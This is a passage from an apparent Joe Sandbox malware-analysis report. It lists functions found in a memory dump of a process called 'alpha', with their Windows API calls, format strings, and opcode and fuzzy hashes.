                                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19ABA4
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19ABCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseDeleteValue$CreateOpen
                                              • String ID: %s=%s
                                              • API String ID: 1019019434-1087296587
                                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                              • Instruction ID: 8049b95ee1353a60d58da7402a6aa6d0db180aa12eda15f9351b1da82214d8a9
                                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                              • Instruction Fuzzy Hash: AE519633B18792C6E7608B65E4447FA76A1FB8D7A4F444234CA4DC37A4DF3AD4498B06
                                              Function 00007FF6EB171884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpwcsrchr
                                              • String ID: COPYCMD
                                              • API String ID: 2429825313-3727491224
                                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction ID: e4d14422dbae43b58e2ff61188029cf241e5834e9c21ec7d040f014ca5932364
                                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction Fuzzy Hash: A8F18223F0865286FB608F51D0443FD32A1AB0DBACF004239DE5DA36E8DE7EA555C74A
                                              Function 00007FF6EB174A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$FullNamePathwcsrchr
                                              • String ID:
                                              • API String ID: 4289998964-0
                                              • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                              • Instruction ID: f3ef13f3ae88038834d718ca46ec350c478affe99d85e721616e516ec3a9d847
                                              • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                              • Instruction Fuzzy Hash: 4BC1D523B0939682EA549B51D5483F963A0FB5DBB8F005530CE0E837F0DF7EA491874A
                                              Function 00007FF6EB19BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                              • String ID:
                                              • API String ID: 3476366620-0
                                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction ID: 044b85cc3b8463fa12efd68c7a85612ad2143e10a661273542f52440968bbfe0
                                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction Fuzzy Hash: AC212122908A4396EA146B20A9553F96791FF8DB7DF845235C51EC22F5DF3EB408C60A
                                              Function 00007FF6EB173D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                              • String ID: %9d
                                              • API String ID: 1006866328-2241623522
                                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                              • Instruction ID: 51e7e19ee802f117d0fdc7442b3f49c00505855945e204659e8ec24192409032
                                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                              • Instruction Fuzzy Hash: BC515E73A08652CAE3008F21E8903E977A0FB49778F414635DA2D977F5CF7EA5458B0A
                                              Function 00007FF6EB178DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                              • Instruction ID: 9c4e64ef89a6cfa99c4076ff05f4ea91672283b4cecd18940507e6319869a7f9
                                              • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                              • Instruction Fuzzy Hash: 36C1DF33A0979286EB618B21E850BF963A4FB9A7ACF044131DA0D877F4DF7EE1458305
                                              Function 00007FF6EB179B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction ID: 084b3e392a0110682bfcd6b17ba879100b43ce34f1347259e072acee626457cb
                                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction Fuzzy Hash: F0A1DF33A1865282EA509B25E4517FA62A1FF8DBA8F404035DE4EC37F4DF7EE405874A
                                              Function 00007FF6EB19FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DiskFreeSpace
                                              • String ID: %5lu
                                              • API String ID: 2448137811-2100233843
                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction ID: f8bab77daf7c69269cc75b6559e686c22f764331b37a0fd9f688e219f98dede5
                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction Fuzzy Hash: 14419123708AC195EB61DF11E8407EAB360FB89798F448036DA4D8B768DF7DD249CB05
                                              Function 00007FF6EB17D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 2081463915-1994581435
                                              • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                              • Instruction ID: 97d337850bf8e61276094fb12efd3c5c975a32252d782ffb75725ad8bedd42a8
                                              • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                              • Instruction Fuzzy Hash: 5271BC63E0C26685FB64AB24E4943F426E0AF0E77CF440835D50EC36F4DFBEA481864A
                                              Function 00007FF6EB1781D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr
                                              • String ID:
                                              • API String ID: 1497570035-0
                                              • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                              • Instruction ID: ae1f9e31cb1f0237a6c40be2689939f25fb3779d7efcfa443464ff38214c98b8
                                              • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                              • Instruction Fuzzy Hash: 21C10723A0869282EA519B16E4503FA67A0FF8D7ACF044135EA4EC77F5DF7EE4018706
                                              Function 00007FF6EB197B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                              • Instruction ID: 1dcba4797cc4799de1bd9c805f8a26903b3e5a723a28bccee8932f9202be4f4b
                                              • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                              • Instruction Fuzzy Hash: 9DA1F063B1839681EE149B6594143F96290AF4DBF8F444230EF6EC77E4EF3EE4418206
                                              Function 00007FF6EB176BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • _pipe.MSVCRT ref: 00007FF6EB176C1E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB176CD1
                                              • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6EB176CFB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heapwcschr$AllocateDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                              • String ID:
                                              • API String ID: 1037144754-0
                                              • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                              • Instruction ID: 4bb76bf453cb0aba4f57fb30e4c432b308e3d2c0ea9408e87f6712070e381d5c
                                              • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                              • Instruction Fuzzy Hash: D271BE33A0865286E7549F24D8913B976A1EF4D778F048238D65DD73F9CF3EA402870A
                                              Function 00007FF6EB1963FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                              • String ID:
                                              • API String ID: 4268342597-0
                                              • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                              • Instruction ID: 69b2894c3dc3223f9794816685d1ec5468e1cfc47cee51b95e6c2d1618566372
                                              • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                              • Instruction Fuzzy Hash: B7814923A08BC281EB658F65A4403B977A0FB4DBE8F194135C94D87774DF3EE4458B1A
                                              Function 00007FF6EB1888C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: OpenToken$CloseProcessThread
                                              • String ID:
                                              • API String ID: 2991381754-0
                                              • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                              • Instruction ID: 7dacd0be2ccdfabee5ea25c326a07ba367173f4787ebc67c292878f2dcbb7a91
                                              • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                              • Instruction Fuzzy Hash: 54219E33A0868287E7119B54D4403BDB760FB897B8F504135EB59936A8DF7EE848CB06
                                              Function 00007FF6EB17586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6EB19C59E), ref: 00007FF6EB175879
                                                • Part of subcall function 00007FF6EB1758D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175903
                                                • Part of subcall function 00007FF6EB1758D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175943
                                                • Part of subcall function 00007FF6EB1758D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB175956
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValueVersion
                                              • String ID: %d.%d.%05d.%d
                                              • API String ID: 2996790148-3457777122
                                              • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                              • Instruction ID: 296f1f733de9e6a1cf5ca69bc0a98f347c22fbd4599302784191d3f525081f54
                                              • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                              • Instruction Fuzzy Hash: 43F0A762A0838187D3109F15B5401AAA651FB8C794F544134D94A47B69CF3DD554CF44
                                              Function 00007FF6EB187854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorFileFindFirstLast
                                              • String ID:
                                              • API String ID: 2831795651-0
                                              • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                              • Instruction ID: fc4fccd2ff9b3a4abcc9478587293328c23fe40fe8cb1e57c2bd55011d61a352
                                              • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                              • Instruction Fuzzy Hash: C1D18D73A0878286E7609F25E4503EA77A1FB887A8F141135DB4E877A8DF3EE541C705
                                              Function 00007FF6EB177D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00007FF6EB177DA1
                                                • Part of subcall function 00007FF6EB18417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB1841AD
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
